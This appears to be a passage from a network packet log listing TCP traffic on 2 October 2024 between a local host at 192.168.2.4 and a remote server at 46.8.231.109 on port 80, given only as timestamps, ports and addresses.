Oct 2, 2024 09:41:26.642632961 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642644882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642656088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642667055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642678022 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642689943 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642699003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642699003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642699003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642699003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642699003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642699003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642700911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642713070 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642724991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642735958 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642822027 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642832994 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642844915 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642895937 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642906904 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642919064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642930984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642946005 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642946005 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642946005 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642946005 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642946005 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642946005 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.643042088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.643053055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.643064976 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.643075943 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.643075943 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.643084049 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.643095016 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.643096924 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.643106937 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.643117905 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.643129110 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.643137932 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.643137932 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.643147945 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.643177032 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.643177032 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.643219948 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.643302917 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.643316031 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.643326998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.643337965 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.643348932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.643412113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.643412113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.643412113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.643434048 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.643445969 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.643456936 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.643466949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.645761013 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.645761013 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.729119062 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729144096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729156017 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729202986 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729214907 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729226112 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729238987 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729351997 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729362011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729373932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729384899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729397058 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729407072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729413986 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.729413986 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.729413986 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.729413986 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.729413986 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.729413986 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.729418039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729429960 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729448080 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.729564905 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729576111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729587078 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729598045 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729609966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729620934 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729640007 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729650974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729696989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.729696989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.729696989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.729696989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.729696989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.729696989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.729794025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729805946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729815960 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729826927 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729839087 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729850054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729913950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729924917 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729935884 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729948044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729959011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729969978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.729991913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.729991913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.729991913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.729991913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.729991913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.730182886 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730271101 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730304956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730355978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730389118 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730420113 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730424881 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.730424881 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.730424881 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.730424881 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.730424881 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.730424881 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.730453014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730468988 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730504990 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730520964 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730535984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730551004 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730571032 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730586052 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730602026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730618000 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730637074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730652094 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730683088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730715036 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730746984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730781078 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730813026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730844021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730849981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.730849981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.730849981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.730849981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.730849981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.730849981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.730875015 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730914116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730946064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.730976105 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731008053 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731040001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731070995 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731081009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.731081009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.731081009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.731081009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.731081963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.731081963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.731105089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731137037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731173038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731204987 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731240034 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731288910 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731321096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731352091 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731411934 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.731411934 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.731411934 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.731411934 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.731411934 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.731383085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731448889 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.731461048 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731467009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.731511116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731542110 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731661081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731694937 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731725931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731758118 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731791973 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731841087 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731873035 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731904030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731935024 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731970072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.731973886 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.731973886 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.731973886 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.731973886 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.731973886 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.731973886 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.732017040 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732048988 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732079983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732111931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732125998 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.732136965 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.732136965 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.732142925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732173920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732177019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.732206106 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732238054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732239962 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.732270956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732304096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732333899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732364893 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732395887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732428074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732458115 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732490063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732521057 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732542038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.732542038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.732542038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.732542038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.732542038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.732542038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.732552052 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732584000 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732614994 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732645035 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732676983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732707977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732741117 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732772112 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732784033 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.732784033 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.732784033 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.732784033 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.732784033 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.732784986 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.732805014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.732882977 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.732882977 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.817694902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.817728043 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.817778111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.817810059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.817840099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.817892075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.817923069 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.817955017 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.817986965 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818033934 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818047047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818047047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818047047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818047047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818065882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818069935 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818099022 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818145990 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818177938 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818207979 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818257093 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818290949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818298101 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818298101 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818298101 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818298101 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818298101 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818324089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818355083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818387032 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818417072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818449020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818479061 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818510056 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818541050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818551064 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818551064 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818551064 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818551064 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818551064 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818551064 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818572044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818619967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818651915 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818682909 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818730116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818761110 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818809986 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818814993 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818814993 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818814993 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818814993 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818830013 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.818857908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818888903 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818918943 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818953037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.818984032 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819019079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819046974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819057941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819057941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819057941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819057941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819057941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819077969 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819127083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819156885 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819205046 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819237947 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819286108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819312096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819344044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819351912 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819351912 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819351912 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819351912 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819351912 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819351912 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819375992 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819425106 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819446087 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819478035 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819525003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819547892 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.819555998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819582939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819613934 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819644928 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819700003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.819741964 CEST	49749	80	192.168.2.4	46.8.231.109
